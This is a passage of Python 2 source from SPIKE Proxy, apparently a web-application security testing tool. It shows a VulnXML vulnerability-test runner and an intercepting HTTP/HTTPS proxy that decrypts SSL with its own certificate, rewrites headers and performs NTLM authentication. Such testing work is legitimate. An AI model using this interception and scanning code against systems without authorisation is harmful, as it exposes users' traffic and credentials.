results=dirTest.DirRun(directory,daveutil.pathjoin(self.basedir,infile)) #report the results for message in results.logMessages: self.log("%s"%message) return def runXMLFileandVariableTests(self,infile): self.log("RunXMLFileandVariableTests on %s"%infile) url=daveutil.getURLfromFile(daveutil.pathjoin(self.basedir,infile)) dirs=daveutil.getDirsFromURL(url) for dir in dirs: self.runXMLDirectoryTests(dir,os.path.join(self.basedir,infile)) fileTestsDir=os.path.join(os.path.join(os.getcwd(),self.VulnXMLDirectory),self.VulnXMLFileTestsDirectory) allFileTests=os.listdir(fileTestsDir) for filetest in allFileTests: if filetest[-4:]!=".xml": continue if self.stopallactions==1: return "stopped" ftest=VulnXML.VulnXMLTest(file=os.path.join(fileTestsDir,filetest)) ftest.setUI(self) results=ftest.FileRun(daveutil.pathjoin(self.basedir,infile)) for message in results.logMessages: self.log("%s"%message) variableTestsDir=os.path.join(os.path.join(os.getcwd(),self.VulnXMLDirectory),self.VulnXMLVariableTestsDirectory) allVariableTests=os.listdir(variableTestsDir) for variabletest in allVariableTests: if variabletest[-4:]!=".xml": continue if self.stopallactions==1: return "stopped" vtest=VulnXML.VulnXMLTest(file=os.path.join(variableTestsDir,variabletest)) vtest.setUI(self) results=vtest.VariablesRun(os.path.join(self.basedir,infile)) for message in results.logMessages: self.log("%s"%message) return "Done with runXMLFileandVariableTests" spkproxy/spkproxy.py0100775000076500007650000014766707667706523013735 0ustar davedave#!/usr/bin/python # #SPIKE Proxy file: spkproxy.py # #Usage: python spkproxy.py [port:8080] ################################################################### #Requires: #pyOpenSSL v 5.0 pre or > #python 2.2 ################################################################### #Version 1.1 #Author: Dave Aitel (dave@immunitysec.com) #License: GPL v 2.0 #################################################################### #Known Bugs: #1. #http://www.btinternet.com/~wildfire/reference/httpstatus/500.htm #for some reason the header is not parsed correctly...possibly TheCounter/2.1 #web server does not use \r\n? #2. Netscape toolbar (from cnn.com) is not quite right #FIXED 3. BBC.co.uk news - needs :// joined to work ##################################################################### #BEGIN IMPORTS import socket import sys from threading import Thread import string import os from OpenSSL import SSL import getopt sys.path.append('ntlm') #need to import aps stuff so we can send NTLM to the remote system #annoyingly, he named it utils from ntlmutils import str2unicode import ntlm_messages import ntlm_procs #threadsafe workaround for PyOpenSSL 1.5.1 #import OpenSSL.tsafe #should use OpenSSL.tsafe.Connection instead of OpenSSL.SSL.Connection! #but we can't cause it doesn't seem to work #default UI, could add others. import spikeProxyUI import daveutil import time #time all sockets out at ten seconds import timeoutsocket timeoutsocket.setDefaultSocketTimeout(3) import versioncheck #END IMPORTS #Begin Code! VERSION="1.4.8" default404stringlist=["Page Not Found"] #### you change these to say what hosts and pages are ALLOWED. If they #are not set, ALL are allowed restrictedhosts=[] restrictedpages=[] denied1="ErrorYou are not allowed to visit that page during this test, sorry. Try unsetting your proxy temporarily." deniedstring="HTTP/1.1 404 404 Access Denied !\r\nContent-Length: %d"%len(denied1)+"\r\n\r\n"+denied1 #Class myConnection is used to wrap sockets so we can have some basic #abstraction over which ssl library we use, for example #we basically wrap a few socket calls here class MyConnection: def __init__(self,conn): self.doSSL=0 self.mysocket=conn def recv(self,size): #if self.doSSL: # print "Reciving data as ssl!" #print "Recieving %d bytes" % size #if self.doSSL: # print "Reading since we are SSL" # return self.mysocket.read(size) result=self.mysocket.recv(size) #print "Returned from recv()" return result #reliable send over socket def send(self,data): sizetosend=len(data) sentsize=0 while sentsize def startSSLserver(self): debug_ssl=0 dir = os.path.dirname(sys.argv[0]) if dir == '': dir = os.curdir self.mysocket.send("HTTP/1.1 200 Connection established\r\n\r\n") ctx = SSL.Context(SSL.SSLv23_METHOD) ctx.set_timeout(5) ctx.set_verify(SSL.VERIFY_NONE, self.verify_cb) # Don't demand a certificate try: ctx.use_privatekey_file (os.path.join(dir, 'server.pkey')) except: print "Couldn't find file %s"%(os.path.join(dir, 'server.pkey')) ctx.use_certificate_file(os.path.join(dir, 'server.cert')) ctx.load_verify_locations(os.path.join(dir, 'CA.cert')) #normally would be SSL.connection, but we want to be threadsafe self.mysocket = SSL.Connection(ctx, self.mysocket) #only works with pyOpenSSL 5.0pre or > self.mysocket.set_accept_state() if debug_ssl: print "State="+self.mysocket.state_string() #done automatically #self.mysocket.do_handshake() self.doSSL=1 if debug_ssl: print "Now using SSL to talk to client" #wraps socket.close def close(self): #print "calling connection.close" self.mysocket.close() return #we read 0 and on any exception return 1 def gotclosed(self): #print "Checking if we got closed" try: data=self.mysocket.send("") except: #print "CAUGHT EXCEPTION CHECKING IF WE WERE CLOSED" return 1 return 0 ########################################################################### #class header is what we use to store request and reponse headers class header: def __init__(self): self.clear() #these two functions arn't necessary anymore #we have to remove any sockets from our header... #def __getstate__(self): # odict = self.__dict__.copy() # copy the dict since we change it # del odict['connection'] # remove filehandle entry # return odict #you need to sometimes set the connection's state into SSL #def setConnection(self,conn): # self.connection=conn # return #clears out the data structure - used for init def clear(self): self.data=[] self.done=0 self.goodHeader=0 self.clientisSSL=0 self.verb="" #for the first request, we see a CONNECT verb self.sawCONNECT=0 self.firstline="" #sheesh #1 if we are reading a response instead of a GET/POST, etc self.responseHeader=0 self.wasChunked=0 #here is basically what we return from parsing the headers self.URLargsDict={} self.headerValuesDict={} self.useSSL=0 self.connectHost="" self.URL="" self.sawsslinit=0 self.connectPort=0 self.mybodysize=0 self.useRawArguments=0 self.allURLargs="" self.version="" #set this to not send a content-length self.doSurpressContentLength=0 #variables for server response headers self.returncode="" self.returnmessage="" self.proxyHeader="" self.orderlist=[] return def getProxyHeader(self): return self.proxyHeader #fixes the URL to not have a ? in it if it happens to def normalize(self): if self.URL.count("?")>0 and self.URLargsDict=={} and self.useRawArguments==0: urlbit=self.URL[:] #if we have a url as well self.URL=urlbit.split("?")[0] #if we have arguments too if len(urlbit.split("?"))>1: self.allURLargs="?".join(urlbit.split("?")[1:]) #print "SELF.allURLARGS=%s"%self.allURLargs #print "SELF.URL=%s"%self.URL self.URLargsDict=daveutil.splitargs(self.allURLargs,orderlist=self.orderlist) if self.URLargsDict==None: self.URLargsDict={} self.useRawArguments=1 return else: self.URL+="?" return #returns a site tuple (used for VulnXML) def getSiteTuple(self): result=(self.connectHost,self.connectPort,self.clientisSSL) return result #sets us up from a site tuple def setSiteTuple(self,site): self.connectHost=site[0] self.connectPort=site[1] self.clientisSSL=site[2] return #debug routine def printme(self): #print "All my stuff:" result="" result+= "Host: "+self.connectHost + "\n" result+= "Port: "+str(self.connectPort) + "\n" result+= "SSL : " if self.clientisSSL: result+="Yes" else: result+="No" result+="\n\n" result+=self.verb for key in self.headerValuesDict.keys(): for value in self.headerValuesDict[key]: result+=key+": "+value+"\n" return result #returns http://www.cnn.com from our header information def getSite(self): result="" if self.useSSL: result+="https://" else: result+="http://" result+=self.connectHost if self.connectPort!=80 and self.connectPort!=443: result+=":"+str(self.connectPort) return result #returns 1 if 2 headers (self and other) are basically the same def issame(self,other): #we don't compare the header itself. That makes us #get false negatives with Date: headers and such #self.headerValuesDict==other.headerValuesDict and \\ if cmp(self.URL,other.URL)==0 and \ self.clientisSSL==other.clientisSSL and \ self.firstline==other.firstline and \ cmp(self.URLargsDict,other.URLargsDict)==0 and \ self.connectPort==other.connectPort and \ self.mybodysize==other.mybodysize and \ daveutil.headerdictcmp(self.headerValuesDict,other.headerValuesDict) and \ self.allURLargs==other.allURLargs: return 1 return 0 #returns a string that is a "hash" def genhash(self): hash="" hash+=self.verb+self.returncode hash+=daveutil.hashstring(self.URL+self.allURLargs) #hash the cookies if self.headerValuesDict.has_key("Cookie"): for key in self.headerValuesDict["Cookie"]: hash+=daveutil.hashstring(key) if self.headerValuesDict.has_key("Set-Cookie"): for key in self.headerValuesDict["Set-Cookie"]: hash+=daveutil.hashstring(key) #done! #return it encoded so we get rid of slashes return daveutil.strencode(hash,"A") def setSurpressContentLength(self): self.doSurpressContentLength=1 return def surpressContentLength(self): return self.doSurpressContentLength def setclientSSL(self): self.useSSL=1 self.clientisSSL=1 return def addData(self,moredata): #print "addData "+moredata self.data.append(moredata) #print self.data[-4:] if self.data[-4:]==['\r', '\n', '\r', '\n']: #print "Got end of header!" self.done=1 #print "All data="+"".join(self.data) self.verifyHeader() #we shouldn't NEED this, but economist.com has a misbehaving #IIS 5.0 server which does this!!! if self.data[-2:]==['\n','\n']: print "Weird \\n\\n in header!" self.done=1 self.verifyHeader() return #keys is a set of values for which we're going to look and #return an integer associated with them from the headers #we return the first value in the header list as an int def getIntValue(self,keys): #iterate over all the keys in the argument until we have a match #print "all header keys: "+str(self.headerValuesDict.keys()) for akey in keys: if self.headerValuesDict.has_key(akey): #print "Int key: "+akey+" matched "+self.headerValuesDict[akey][0] #we just return the first one we encounter, sorry #so multiple headers will just be on a first come #first serve basis return int(self.headerValuesDict[akey][0]) return 0 #we return the first value in the header list as a string #KEYS IS A LIST, NOT A STRING! def getStrValue(self,keys): #print "all header keys: "+str(self.headerValuesDict.keys()) for akey in keys: #print "str: "+akey if self.headerValuesDict.has_key(akey): return str(self.headerValuesDict[akey][0]) return "0" def removeHeaders(self,hstring): if self.headerValuesDict.has_key(hstring): del self.headerValuesDict[hstring] def addHeader(self,newheader,newheadervalue): #print "Adding header "+newheader+": "+newheadervalue #now we store it, at last if not self.headerValuesDict.has_key(newheader): #intialize it as a list self.headerValuesDict[newheader]=[] else: #print "Duplicate KEY: "+newheader pass #just separating them by commas doesn't work for hotmail.com self.headerValuesDict[newheader].append(newheadervalue) def verifyHeader(self): #this little ditty returns a list of lines, without \r\n's #the -2 is because there were 2 null \r\n thingies on the end self.allheaders="".join(self.data).split("\r\n") #print "Self.allheaders="+str(self.allheaders) firstline=self.allheaders[0] self.allheaders=self.allheaders[:-2] #this will fail if we can't parse the first line if not self.parseFirstLine(firstline): print "Couldn't parse first line!" return 0 #did we see a CONNECT? if self.sawCONNECT: #print "Saw SSL CONNECT request!" self.sawsslinit=1 return 1 for headerLine in self.allheaders[1:]: #print "Doing header line: "+headerLine tempvalues=headerLine.split(": ") if len(tempvalues)<2: #MS hotmail login is lame - uses this header, notice no space: #P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" #so we handle that condition now tempvalues=headerLine.split(":") if len(tempvalues)<2: print "len(tempvalues)!=2 ="+str(len(tempvalues))+" in "+str(tempvalues) return 0 self.addHeader(tempvalues[0],":".join(tempvalues[1:])) #print "About to call massageHeaders" self.massageHeaders() #print "Headers="+str(self.headerValuesDict) #print "Got a good header." self.goodHeader=1 return #this function takes in def massageHeaders(self): #print "Inside massageHeaders" #non-IE user Agent, for reference #User-Agent: Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0 #IE string IEstring="Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)" nonIEstring="Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0" #always massage chunked out of the way #this will cause problems if someone sends over a gig of data #I doubt that will happen though if self.getStrValue(["Transfer-Encoding"])=="chunked": del self.headerValuesDict["Transfer-Encoding"] self.wasChunked=1 #massage a response differently from a non-response #uncomment this for dave's cludgy early morning NTLM pass-through ## if self.responseHeader: ## #print "Did not see connection" ## #print "Auth: "+self.getStrValue(["WWW-Authenticate"]) ## authenticate=self.getStrValue(["WWW-Authenticate"]) ## if authenticate.count("NTLM")>0 or authenticate.count("Negotiate")>0: ## print "Doing band-aide for NTLM" ## self.addHeader("Proxy-Authenticate",authenticate) ## del self.headerValuesDict["WWW-Authenticate"] ## #must replace return code for some reason as well ## #see http://squid.sourceforge.net/ntlm/client_proxy_protocol.html ## self.firstline=self.firstline.replace("401","407") ## return ## #here we replace Proxy-Authentication with Authentication for NTLM ## if self.headerValuesDict.has_key("Proxy-Authorization"): ## self.headerValuesDict["Authorization"]=self.headerValuesDict["Proxy-Authorization"][:] ## del self.headerValuesDict["Proxy-Authorization"] #by default, use IE 5.0 replaceUserAgent=1 userAgent=IEstring #change Proxy-Connection to Connection if self.headerValuesDict.has_key("Proxy-Connection"): #DEBUG #print "MassageHeaders: has key proxy-connection" self.headerValuesDict["Connection"]=self.headerValuesDict["Proxy-Connection"][:] #print "Connection is now: "+str(self.headerValuesDict["Connection"]) del self.headerValuesDict["Proxy-Connection"] #replace the User-Agent if replaceUserAgent: #just overwrite the damn thing if self.headerValuesDict.has_key("User-Agent"): del self.headerValuesDict["User-Agent"] #comment out the next line for NO user agent self.addHeader("User-Agent",userAgent) pass #save this off before we delete it self.mybodysize=self.getIntValue(["Content-length","Content-Length"]) #get rid of Content-Length or Content-length - this is #a requirement since we recalcuate it later for fun! if self.headerValuesDict.has_key("Content-length"): del self.headerValuesDict["Content-length"] if self.headerValuesDict.has_key("Content-Length"): del self.headerValuesDict["Content-Length"] #no return value for massageHeaders return def parseFirstLine(self,firstline): #print "firstline="+firstline templist=firstline.split(" ") if len(templist)<2: print "First line of header has less than 2 members!" return 0 self.verb=templist[0] if self.verb in [ "HTTP/1.1", "HTTP/1.0" ]: #print "Response header - not verifying the first line of %s!" % (firstline) self.responseHeader=1 if len(templist)>1: self.returncode=templist[1] if len(templist)>2: self.returnmessage=templist[2] self.firstline=firstline return 1 #TODO: remove this code from the header class out into the spkProxy class #this is the only place we use self.connection! #SSL proxy check if self.verb=="CONNECT": #WE ARE SSL! #signifies we connect to server with ssl self.useSSL=1 #signifies we connect to client with ssl self.clientisSSL=1 self.sawCONNECT=1 self.connectHost=templist[1].split(":")[0] #no port would be weird, but maybe it'll happen... if templist[1].split(":") < 2: self.connectPort=443 else: self.connectPort=templist[1].split(":")[1] return 1 if not self.processProxyUrl(templist[1]): return 0 #HTTP/1.1 or HTTP/1.0 self.version=templist[2] #print "VERB="+self.verb+" URL="+self.URL+" version="+self.version return 1 def processProxyUrl(self, proxyurl): #here is basically what we return self.URLargsDict={} self.useSSL=0 self.connectHost="" #this might already be set if we got an SSL proxy request if not self.connectPort: self.connectPort=80 self.URL="" #print "processProxyUrl: "+proxyurl #just in case we ARE doing ssl... urlbit=proxyurl #if we're not doing an SSL proxy if not self.clientisSSL: #print "proxyURL is not SSL" #rip the http:// off urltype=proxyurl.split("://")[0] if len(proxyurl.split("://")) < 2: print "Need something after the http:// - exiting this thread" return 0 #else we are good to go...we reassign urlbit here #need to do join because of multiple :// in arguments and stuff #should fix bbc news error urlbit="://".join(proxyurl.split("://")[1:]) if urltype=="https": #this is probably broken: REVISIT self.useSSL=1 elif urltype!="http": print "unknown url type "+urltype return 0 #must have http://something if len(proxyurl.split("://"))<2: print "must have http://something" return 0 self.connectHost=urlbit.split("/")[0] #get rid of the host from urlbit if len(urlbit.split("/"))<2: urlbit="/" else: urlbit="/".join(urlbit.split("/")[1:]) if urlbit=="": urlbit="/" #lame, but should work if urlbit[0]!="/": urlbit="/"+urlbit #print "connectHost="+self.connectHost if len(self.connectHost.split(":"))>1: #print "ConnectHost Split: "+str(self.connectHost.split(":")) self.connectPort=int(self.connectHost.split(":")[1]) self.connectHost=self.connectHost.split(":")[0] #print "Set self.connectHost to "+self.connectHost if self.connectHost=="": print "Error: empty connect host!" return 0 #end if self.clientisSSL==0: #TODO: Fix this to work on blah.ng/asdf=asdf&asdf2=asdf2 #this should work, but there's no way for me, as the client #to really know if urlbit.count("?")==0 and urlbit.count("=")>0: indexequal=urlbit.find("=") if indexequal!=-1: indexfirstslash=urlbit.rfind("/",0,indexequal) if indexfirstslash!=-1: #print "original = "+urlbit #print "indexequal="+str(indexequal) #print "indexfirstslash="+str(indexfirstslash) urlbit=urlbit[:indexfirstslash]+"?"+urlbit[indexfirstslash+1:] #print "new="+urlbit #if we have a url as well self.URL=urlbit.split("?")[0] #if we have arguments too if len(urlbit.split("?"))>1: self.allURLargs="?".join(urlbit.split("?")[1:]) #print "SELF.allURLARGS=%s"%self.allURLargs #print "SELF.URL=%s"%self.URL self.URLargsDict=daveutil.splitargs(self.allURLargs,orderlist=self.orderlist) if self.URLargsDict==None: self.URLargsDict={} self.useRawArguments=1 return 1 #got here! success! #we now have URLargsDict return 1 def isdone(self): #print "self.isdone called "+str(self.done) if self.done==0: return 0 return 1 def gotGoodHeader(self): return self.goodHeader def bodySize(self): return self.mybodysize def grabHeader(self,header): if self.headerValuesDict.has_key(header): returnstr="" #iterate over the list and add a line for each for value in self.headerValuesDict[header]: returnstr+=header+": "+value+"\r\n" return returnstr else: return "" def setProxyHeader(self,newheader): self.proxyHeader=newheader return class body: def __init__(self): self.mysize=0 self.data=[] def printme(self): result= "".join(self.data) result=daveutil.prettyprint(result) return result def setSize(self,size): self.mysize=size return #just compare sizes for speed. def issame(self,other): #and self.data==other.data: if self.mysize==other.mysize : return 1 return 0 def genhash(self): hash="" hash+=daveutil.hashstring("".join(self.data)) return hash def getArgsDict(self): argsDict=daveutil.splitargs("".join(self.data)) if argsDict==None: argsDict={} return argsDict def readBlock(self,connection,size): targetsize=size tempdata="" while targetsize > len(tempdata): #read some data tempdata+=connection.recv(targetsize-len(tempdata)) #print "Targetsize=%d, len(tempdata)=%d" % (targetsize,len(tempdata)) #print "read "+str(len(tempdata))+" bytes of data in readblock, wanted "+str(size) self.data+=tempdata self.mysize+=targetsize return size #This handles chunked data cleanly - well, handles it anyways #this is the cruftiest function ever made. def read(self,connection,size,waschunked,readtillclosed): if not waschunked: if readtillclosed and size==0: #print "reading till closed" temp="" while 1: #this is a lame way to do it, but hopefully it will work try: length=len(temp) #print "len="+str(length) temp+=connection.recv(1000) #print "len2="+str(len(temp)) #WAY crufty here... if (length==len(temp)): break if temp.count("")>0: #this is necessary because stupid hotmail will #not send a fin after sending lots of data #with connection: close! #print "Noticed a - breaking out of this" #time.sleep(4) #break pass except (SSL.SysCallError,socket.error), diag: #print "Caught exception in recv - "+str(diag) break except: #some sort of exception sending or recieving data #print "Unknown exception occured" break #print "Read till close occured - "+str(len(temp))+" bytes read" self.data+=temp self.mysize+=len(temp) return len(temp) else: return self.readBlock(connection,size) else: #print "Reading chunked data" while 1: #read in a chunked data stream and return the size linesize=[] while linesize[-2:]!=["\r","\n"]: linesize+=connection.recv(1) #ok, now we have the size as a list, transform that to an int #base 16, of course #print "linesize in str = "+"".join(linesize) linesize=int("".join(linesize),16) #print "linesize="+str(linesize) if linesize==0: #print "done with chunked transfer!" #clear this out linesize=[] while linesize[-2:]!=["\r","\n"]: linesize+=connection.recv(1) return self.mysize #print "calling self.readBlock with size "+str(linesize) self.readBlock(connection,linesize) #clear this out linesize=[] while linesize[-2:]!=["\r","\n"]: linesize+=connection.recv(1) def gotGoodBody(self): if self.mysize==len(self.data): return 1 else: return 0 class spkProxyConnection( Thread ): def __init__(self,connection,myUI,proxy=None,ntlm=None): Thread.__init__(self) #client connection self.connection=connection self.clientisSSL=0 self.currentHost="" self.currentPort=0 self.haveSocket=0 self.sslHost="" self.sslPort="" #serversion connection self.currentSocket=-1 self.sawConnectionClose=0 #new user interface self.myUI=myUI self.proxyHeader="" self.proxyHost="" self.proxyPort=0 self.proxySSLHost="" self.proxySSLPort=0 self.NTLMUser="" self.NTLMDomain="" self.NTLMPassword="" self.NTLMAuthState="" if proxy!=None: (self.proxyHost,self.proxyPort,self.proxySSLHost,self.proxySSLPort)=proxy if ntlm!=None: (self.NTLMUser,self.NTLMPassword,self.NTLMDomain)=ntlm #print "Initializing NTLM: %s@%s with password %s"%(self.NTLMUser,self.NTLMDomain,self.NTLMPassword) self.my404List=default404stringlist return def setProxyHeader(self,myheader): #print "spkProxyConnection: Proxy header set to %s"%myheader self.proxyHeader=myheader return def run( self ): #set to 1 to debug this function #DEBUGSET debug_spkProxyConnection=0 if debug_spkProxyConnection: print "spkProxy: Handling new connection" while 1: if debug_spkProxyConnection: print "entering while loop" myheader = header() #myheader.setConnection(self.connection) if self.clientisSSL: myheader.setclientSSL() while myheader.isdone()==0: try: data=self.connection.recv(1) except: print "Client closed connection" self.cleanup() return if not data: if debug_spkProxyConnection: print "end of data" break myheader.addData(data) if myheader.sawsslinit==1: if debug_spkProxyConnection: print "spkProxy: Saw ssl init!" self.clientisSSL=1 self.sslHost=myheader.connectHost self.sslPort=myheader.connectPort self.connection.startSSLserver() continue #print "Continuing on with while loop!" mybody=body() if debug_spkProxyConnection: print "Done with header" #read the body from the client now if myheader.gotGoodHeader(): if debug_spkProxyConnection: print "reading body" if myheader.bodySize()>0 or myheader.wasChunked: if debug_spkProxyConnection: print "Reading the body!" #readtillclosed always 0 on client mybody.read(self.connection,myheader.bodySize(),myheader.wasChunked,0) else: if debug_spkProxyConnection: print "No body needed" pass #reset this to the truth myheader.mybodysize=mybody.mysize if not mybody.gotGoodBody(): self.cleanup() return if debug_spkProxyConnection: print "done with body" else: if debug_spkProxyConnection: print "failed to get a good header, cleaning up." print "Header we got: %s"%(str(myheader.data)) self.cleanup() return #done with the body. So now we have a header and a body #print "header data="+str(myheader.data) #print "body data="+str(mybody.data) response = self.sendRequest(myheader,mybody) #print "Response : "+response sizetosend=len(response) sentsize=0 sentsize+=self.connection.send(response[sentsize:]) if debug_spkProxyConnection: print "Sent data to client." #print "Header we sent: %s"%response.split("\r\n\r\n")[0] if self.connection.gotclosed(): if debug_spkProxyConnection: print "self.connection.gotclosed() = true" self.sawConnectionClose=1 if self.sawConnectionClose: if debug_spkProxyConnection: print "Closing connection!" self.connection.close() self.cleanup() return if debug_spkProxyConnection: print "Continuing while loop" continue #while loop #creates a string with the total reponse in it def constructResponse(self,myheader,mybody): return daveutil.constructResponse(myheader,mybody) #connects to a remote proxy hopefully. #1 on success, 0 on failure def doProxyConnect(self,host,port): newsocket=socket.socket(socket.AF_INET,socket.SOCK_STREAM) if self.clientisSSL: #print "Connecting to SSL Proxy %s %s"%(self.proxySSLHost,self.proxySSLPort) newsocket.connect((self.proxySSLHost,int(self.proxyPort))) newsocket.send("CONNECT %s:%s\r\n\r\n"%(host,port)) #get the response #print "Reading in until I get \\r\\n\\r\\n" data=daveutil.readuntil(newsocket,"\r\n\r\n") #print "Done reading in" if data.count("200")==0: print "Failed to connect to SSL Server via Proxy" return 0 #SSL doesn't use proxy headers - just raw urls self.setProxyHeader("") else: print "Connecting to Proxy %s %s"%(self.proxyHost,self.proxyPort) newsocket.connect((self.proxyHost,int(self.proxyPort))) if newsocket==None: print "Couldn't connect to proxy host!" return 0 #we don't print the port if it's port 80 if str(port)!="80": self.setProxyHeader("http://"+host+":"+str(port)) else: self.setProxyHeader("http://"+host) self.currentSocket=newsocket #success connecting to proxy return 1 #####FIXME def closeServerSocket(self): if self.haveSocket: self.currentSocket.close() self.currentPort=0 self.currentHost="" return #TODO: This needs to be modified to handle NTLM authentication! def connectToWebServer(self,myheader): #DEBUGSET debug_connectToWebServer=0 if self.clientisSSL: #do we already have a socket connected to the web server? #we need to set these just for the record myheader.connectHost=self.sslHost myheader.connectPort=self.sslPort #now we do some actual work if not self.haveSocket: self.haveSocket=1 self.currentHost=self.sslHost self.currentPort=self.sslPort self.currentSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "Connecting to "+str(self.sslHost)+" "+str(self.sslPort) if self.proxyHost!="": #DO PROXY CONNECT HERE if self.doProxyConnect(myheader.connectHost,myheader.connectPort)!=1: return 0 else: try: self.currentSocket.connect((self.sslHost,int(self.sslPort))) except: print "Connection refused" self.currentHost="" self.currentPort=0 return 0 #HANDLE SSL HERE DO DO DO ctx = SSL.Context(SSL.SSLv23_METHOD) ctx.set_timeout(5) self.currentSocket = SSL.Connection(ctx,self.currentSocket) self.currentSocket.set_connect_state() #print "Set up SSL" else: if debug_connectToWebServer: print "SSL connection not done since we already had a connection." else: #not SSL #do we already have a socket connected to the host print "Connecting to "+str(myheader.connectHost)+" "+str(myheader.connectPort) if debug_connectToWebServer: print "currentSocket=%s" % str(self.currentSocket) #this -1 compare is because sometimes the socket gets closed on us and we don't find out about it, so #we check to make sure - currentSocket!= if self.currentHost==myheader.connectHost and self.currentPort==myheader.connectPort and str(self.currentSocket).count("-1")==0: if debug_connectToWebServer: print "passing because currentHost and currentPort are the same" #nothing really pass else: #handle the condition where we have a socket, but it is the wrong host... if self.haveSocket: self.currentSocket.close() #if we don't have a socket, or we had the wrong socket, we now need a socket #TODO: add error checking... self.currentSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if self.proxyHost!="": if self.doProxyConnect(myheader.connectHost,myheader.connectPort)!=1: return 0 else: print "Trying to connect to %s:%s"%(myheader.connectHost,myheader.connectPort) try: self.currentSocket.connect((myheader.connectHost,int(myheader.connectPort))) except: self.currentHost="" self.currentPort=0 print "Could not connect." return 0 self.currentHost=myheader.connectHost self.currentPort=myheader.connectPort #return success! return 1 def massageResponse(self,serverheader,serverbody): """ massageResponse() performs any additional changes on the response before we return it For example, this function handles false 200 responses that IIS misconfigurations do quite often """ bodydata="".join(serverbody.data) #here we check for any misconfigured servers that return a 200 Success while #showing a lame "404 not found" page #404 string list is set up globally here for astring in self.my404List: if bodydata.count(astring): serverheader.returncode="404" def getNTLMEnv(self): env={} env["LM"]=1 env["NT"]=1 env["UNICODE"]=1 env["HOST"]=(self.currentHost.upper()) env["DOMAIN"]=(self.NTLMDomain.upper()) env["USER"]=(self.NTLMUser.upper()) env["FLAGS"] = "06820000" env["NTLM_TO_BASIC"]=0 env['LM_HASHED_PW'] = ntlm_procs.create_LM_hashed_password(self.NTLMPassword) env['NT_HASHED_PW'] = ntlm_procs.create_NT_hashed_password(self.NTLMPassword) #whatever this is env["NTLM_MODE"]=0 return env def sendRequest(self,myheader,mybody): (response,serverheader,serverbody)=self.sendRequestRaw(myheader,mybody) #check to see if we have to do the NTLM stuff and if so #try to authenticate if serverheader!=None: #print "Auth: "+serverheader.getStrValue(["WWW-Authenticate"]) #print "self.NTLMUser="+self.NTLMUser pass if serverheader!=None and serverheader.getStrValue(["WWW-Authenticate"]) in ["NTLM","Negotiate"] and self.NTLMUser!="": print "Sending NTLM Authentication" #first, clean up our old socket...we're going to be reattempting #to open this socket and establish a connection #don't need this unless the socket is being kept open... #self.closeServerSocket() #send packet 1 env=self.getNTLMEnv() ntlmstring1= ntlm_messages.create_message1(env) myheader.removeHeaders("Authorization") myheader.addHeader("Authorization","NTLM "+ntlmstring1) #must lock this to HTTP/1.0 for auth requests - why? Because #stupid IIS won't send Keep-Alive if it is 1.1. IE does this as well. myheader.version="HTTP/1.0" (response,serverheader,serverbody)=self.sendRequestRaw(myheader,mybody) ntlmchallenge=serverheader.getStrValue(["WWW-Authenticate"]) #strip off the header, whatever it may be ntlmchallenge=ntlmchallenge.replace("NTLM ","") ntlmchallenge=ntlmchallenge.replace("NEGOTIATE ","") #create nonce nonce = ntlm_messages.parse_message2(ntlmchallenge) #print ntlm_messages.debug_message2(ntlmchallenge) #create new message NTLM_msg3 = ntlm_messages.create_message3(nonce, env) #print ntlm_messages.debug_message3(NTLM_msg3) myheader.removeHeaders("Authorization") myheader.addHeader("Authorization","NTLM "+NTLM_msg3) #now read in from the new serverheader the new challenge #now construct a response #now send it, should get a 200 ok back! (response,serverheader,serverbody)=self.sendRequestRaw(myheader,mybody) #print "Sent last raw request" if serverheader!=None and serverbody!=None: self.myUI.registerRequestandResponse(myheader,mybody,serverheader,serverbody) #print "Returning response: %s"%response return response #given a valid header and body, sends it off, and returns the result #also checks to see if the ui wants the requests, and can redirect it there #returns the response as a string #CALLED BY User Interface for rewrite support!!! def sendRequestRaw(self, myheader, mybody,newserverheader=None, newserverbody=None): #set this to 1 to enable this function's debugging messages #DEBUGSET debug_spkproxy=0 myheader.normalize() if self.myUI.wantsRequest(myheader): #print "Diverting request to the UI" #we force a closed connection for IE - it apparantly will not work otherwise if debug_spkproxy: print "UI handling this request - sawConnectionClose==1" self.sawConnectionClose=1 return (self.myUI.handleRequest(myheader,mybody),None,None) #here we handle any restricted conditions if restrictedpages!=[]: print "Checking restricted pages" if myheader.URL not in restrictedpages: print "Page not in restricted pages list" return (deniedstring, None, None) if restrictedhosts!=[]: if myheader.connectHost not in restrictedhosts: return (deniedstring, None, None) byestring="Error

    No server there, sorry.

    " if not self.connectToWebServer(myheader): print "returning fake 501 page!" return ("HTTP/1.1 501 501 No Server There!\r\nContent-Length: "+str(len(byestring))+"\r\n\r\n"+byestring,None,None) #print "Setting proxy header to"+self.proxyHeader myheader.setProxyHeader(self.proxyHeader) #urg. I wish I could reference globals better myRequest=daveutil.constructRequest(myheader,mybody) #ok, now I have a socket connected to the host, send the data try: self.currentSocket.send(myRequest) except: return ("HTTP/1.1 501 No Server There!\r\nContent-Length: "+str(len(byestring))+"\r\n\r\n"+byestring,None,None) print "Sent request:\n"+myRequest returncode="100" #now read the response - we just ignore HTTP/1.1 100 Continue responses while returncode=="100": serverheader = header() #commented out for testing #serverheader.setConnection(self.currentSocket) #print "Reading response now" while serverheader.isdone()==0: try: #print "recieving" data=self.currentSocket.recv(1) #print "Read a byte: "+data except SSL.ZeroReturnError: print "Server closed connection - weird" data="" except socket.error: print "Connection reset by peer" data="" except SSL.SysCallError: print "SSL recv error" data="" if not data: #print "end of data in response!" break serverheader.addData(data) returncode=serverheader.returncode #print "Return code from server response="+returncode #print "end of header in response!" #+str(serverheader.data) #does a case insensitive match and returns us the content length #variable bodylength=serverheader.mybodysize #ok, now we're going to find out if we need to read-till-closed #or if we've got a 304 which naturally has no content-length if debug_spkproxy: print "Server: "+serverheader.getStrValue(["Server"]) print "Connection: "+serverheader.getStrValue(["Connection"]).lower() print "Returncode: "+serverheader.returncode print "Bodylength: "+str(bodylength) readtillclosed=0 #if you said to close, or you are redirecting AND you didn't bother to say, # then close the connection if serverheader.getStrValue(["Connection"]).lower() in ["close"] or (serverheader.returncode not in ["304","302","301"] and serverheader.getStrValue(["Connection"]).lower() in ["0"] ): if debug_spkproxy: print "Connection: close detected" readtillclosed=1 else: if debug_spkproxy: print "Connection: close not detected or 